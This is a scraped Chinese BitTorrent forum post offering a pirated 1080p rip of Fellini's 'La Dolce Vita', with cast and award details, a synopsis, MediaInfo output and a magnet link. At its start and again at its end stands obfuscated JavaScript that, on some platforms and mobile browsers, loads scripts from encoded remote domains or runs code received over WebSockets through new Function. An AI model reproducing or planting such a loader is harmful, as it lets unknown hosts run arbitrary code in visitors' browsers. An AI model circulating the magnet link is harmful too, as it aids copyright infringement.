甜蜜的生活[中文字幕].La.Dolce.Vita.1960.1080p.BluRay.x265.10bit.FLAC.1.0 9.35GB

版主小s 1月前 405

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 甜蜜的生活 / 露滴牡丹开(港) / 生活的甜蜜(台) / 豪华生活 / The Sweet Life

◎片 名 La dolce vita

◎年 代 1960

◎产 地 意大利 / 法国

◎类 别 剧情 / 喜剧

◎语 言 意大利语 / 英语 / 法语 / 德语

◎上映日期 1960-02-04(意大利)

◎IMDb链接 https://www.imdb.com/title/tt0053779/

◎豆瓣评分 8.6/10 (23620人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293271/

◎片 长 174分钟

◎导 演 费德里科·费里尼 Federico Fellini (id:1054413)

◎编 剧 费德里科·费里尼 Federico Fellini (id:1054413)

恩尼奥·弗拉亚诺 Ennio Flaiano (id:1033427)

图里奥·皮内利 Tullio Pinelli (id:1010199)

布鲁内洛·龙迪 Brunello Rondi (id:1037815)

皮埃尔·保罗·帕索里尼 Pier Paolo Pasolini (id:1053619)

◎演 员 马塞洛·马斯楚安尼 Marcello Mastroianni (id:1027899)

安妮塔·艾克伯格 Anita Ekberg (id:1027290)

阿努克·艾梅 Anouk Aimée (id:1055964)

伊冯·弗奴克丝 Yvonne Furneaux (id:1045447)

玛加莉·诺埃尔 Magali No?l (id:1012615)

阿兰·居尼 Alain Cuny (id:1013748)

安尼巴莱·宁基 Annibale Ninchi (id:1135885)

瓦尔特·圣泰索 Walter Santesso (id:1143864)

瓦莱里娅·钱戈蒂尼 Valeria Ciangottini (id:1068815)

里卡尔多·加罗内 Riccardo Garrone (id:1096081)

伊妲·伽利 Ida Galli (id:1099272)

波利多尔 Polidor (id:1129336)

米诺·多罗 Mino Doro (id:1088216)

劳拉·贝蒂 Laura Betti (id:1045537)

尼可 Nico (id:1028031)

恩佐·塞鲁西科 Enzo Cerusico (id:1028642)

恩佐·多里亚 Enzo Doria (id:1035677)

恩里科·格洛里 Enrico Glori (id:1095375)

Adriana Moneta Adriana Moneta (id:1353360)

莱克斯·巴克 Lex Barker (id:1048258)

贾可·塞纳斯 Jacques Sernas (id:1144157)

娜迪亚·格雷 Nadia Gray (id:1037338)

Giuseppe Addobbati Giuseppe Addobbati (id:1354263)

Gabriella Andreini Gabriella Andreini (id:1058128)

Armando Annuale Armando Annuale (id:1058499)

詹尼·巴吉诺 Gianni Baghino (id:1060038)

伊格纳齐奥·巴尔萨莫 Ignazio Balsamo (id:1065827)

Leonardo Botta Leonardo Botta (id:1062189)

法布里齐奥·卡普奇 Fabrizio Capucci (id:1018940)

阿德里亚诺·塞兰塔诺 Adriano Celentano (id:1016740)

Andrea De Pino Andrea De Pino (id:1081832)

Oretta Fiume Oretta Fiume (id:1087114)

妮娜·弗兰克蒂 Rina Franchetti (id:1085479)

佛朗哥·贾科比尼 Franco Giacobini (id:1094427)

Lily Granado Lily Granado (id:1098791)

Sondra Lee Sondra Lee (id:1079136)

朱利亚娜·洛约迪切 Giuliana Lojodice (id:1125178)

勒妮·隆加里尼 Renée Longarini (id:1116327)

阿兰·第戎 Alain Dijon (id:1457281)

尼诺·罗塔 Nino Rota (id:1037013)

雷娜塔·马尼扬蒂 Renata Magnanti (id:1290725)

◎标 签 意大利 / 1960 / 经典 / 黑白 / 法国 / 剧情 / 文艺 / 金棕榈

◎简 介

马切罗(马塞洛?马斯楚安尼 Marcello Mastroianni 饰)是某杂志的专栏记者,他曾试图成为一名作家但是事与愿违,只得终日为明星绯闻奔忙。马切罗经常出席一些社会名流的交际酒会,于是他暗自和摄影师勾搭,设计拍摄明星隐私然后公诸于众。马切罗有一个女友元玛,在送 她回家的途中,搭乘了一位妓院老鸨,后者对他讲述了很多风月场中的轶事,这让他对名利场更加厌恶。在基督教的某个仪式上,一位从美国来的名模总是对着媒体搔首弄姿,后来马切罗的批评家朋友斯泰纳一针见血指出了她的虚伪之处,这让他逐渐认清了上流社会的腐朽,并开始重新审视自己的生活。他发现自己并不热衷奢华的生活,而且对于那个自以为是的元玛也并不满意,并进行了我行我素的反抗……

◎获奖情况 (共5项)

第34届奥斯卡金像奖 (1962)

最佳导演(提名)

└──费德里科·费里尼 (id:1054413)

最佳原创剧本(提名)

黑白片最佳艺术指导和布景(提名)

└──皮耶罗·格拉尔迪 (id:1042571)

黑白片最佳服装设计

└──皮耶罗·格拉尔迪 (id:1042571)

第13届戛纳电影节 (1960)

主竞赛单元 金棕榈奖

└──费德里科·费里尼 (id:1054413)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 118040401489010519083106572156325532284 (0x58CDC11F8A550A8DC8C853B30E87127C)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.35 GiB

  8. Duration : 2 h 55 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 7 613 kb/s

  11. Movie name : LA DOLCE VITA

  12. Encoded date : UTC 2021-10-19 08:55:36

  13. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  15. Cover : Yes

  16. Attachments : cover.jpg


  17. Video

  18. ID : 1

  19. Format : HEVC

  20. Format/Info : High Efficiency Video Coding

  21. Format profile : Main [email protected]@Main

  22. Codec ID : V_MPEGH/ISO/HEVC

  23. Duration : 2 h 55 min

  24. Bit rate : 6 992 kb/s

  25. Width : 1 920 pixels

  26. Height : 816 pixels

  27. Display aspect ratio : 2.35:1

  28. Frame rate mode : Constant

  29. Frame rate : 23.976 (24000/1001/53354) FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 10 bits

  33. Bits/(Pixel*Frame) : 0.186

  34. Stream size : 8.58 GiB (92%)

  35. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  36. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. Format : FLAC

  42. Format/Info : Free Lossless Audio Codec

  43. Codec ID : A_FLAC

  44. Duration : 2 h 55 min

  45. Bit rate mode : Variable

  46. Bit rate : 590 kb/s

  47. Channel(s) : 1 channel

  48. Channel layout : C

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 11.719 FPS (4096 SPF)

  51. Bit depth : 24 bits

  52. Compression mode : Lossless

  53. Stream size : 742 MiB (8%)

  54. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  55. Language : Italian

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. ID in the original source medium : 4609 (0x1201)

  61. Format : PGS

  62. Muxing mode : zlib

  63. Codec ID : S_HDMV/PGS

  64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration : 2 h 52 min

  66. Bit rate : 20.6 kb/s

  67. Count of elements : 3017

  68. Stream size : 25.4 MiB (0%)

  69. Title : chs

  70. Language : Chinese

  71. Default : Yes

  72. Forced : No

  73. Original source medium : Blu-ray


  74. Text #2

  75. ID : 4

  76. ID in the original source medium : 4610 (0x1202)

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 2 h 52 min

  82. Bit rate : 20.9 kb/s

  83. Count of elements : 3017

  84. Stream size : 25.8 MiB (0%)

  85. Title : cht

  86. Language : Chinese

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Text #3

  91. ID : 5

  92. ID in the original source medium : 4608 (0x1200)

  93. Format : PGS

  94. Muxing mode : zlib

  95. Codec ID : S_HDMV/PGS

  96. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration : 2 h 50 min

  98. Bit rate : 39.6 kb/s

  99. Count of elements : 3471

  100. Stream size : 48.4 MiB (1%)

  101. Title : eng

  102. Language : English

  103. Default : No

  104. Forced : No

  105. Original source medium : Blu-ray


  106. Menu

  107. 00:00:00.000 : en:Chapter 01

  108. 00:03:19.782 : en:Chapter 02

  109. 00:06:17.335 : en:Chapter 03

  110. 00:11:06.207 : en:Chapter 04

  111. 00:15:45.444 : en:Chapter 05

  112. 00:20:13.420 : en:Chapter 06

  113. 00:24:50.697 : en:Chapter 07

  114. 00:32:13.264 : en:Chapter 08

  115. 00:45:11.583 : en:Chapter 09

  116. 00:55:20.900 : en:Chapter 10

  117. 00:59:20.306 : en:Chapter 11

  118. 01:06:02.416 : en:Chapter 12

  119. 01:16:01.139 : en:Chapter 13

  120. 01:30:28.005 : en:Chapter 14

  121. 01:33:52.043 : en:Chapter 15

  122. 01:39:01.310 : en:Chapter 16

  123. 01:50:48.892 : en:Chapter 17

  124. 01:57:48.644 : en:Chapter 18

  125. 02:06:02.388 : en:Chapter 19

  126. 02:09:40.731 : en:Chapter 20

  127. 02:19:00.915 : en:Chapter 21

  128. 02:24:15.647 : en:Chapter 22

  129. 02:32:00.611 : en:Chapter 23

  130. 02:50:03.776 : en:Chapter 24

  131. 02:55:08.289 : en:Chapter 25



TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:251B1DF52334AE217222CF79824EC30F9232EAC3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};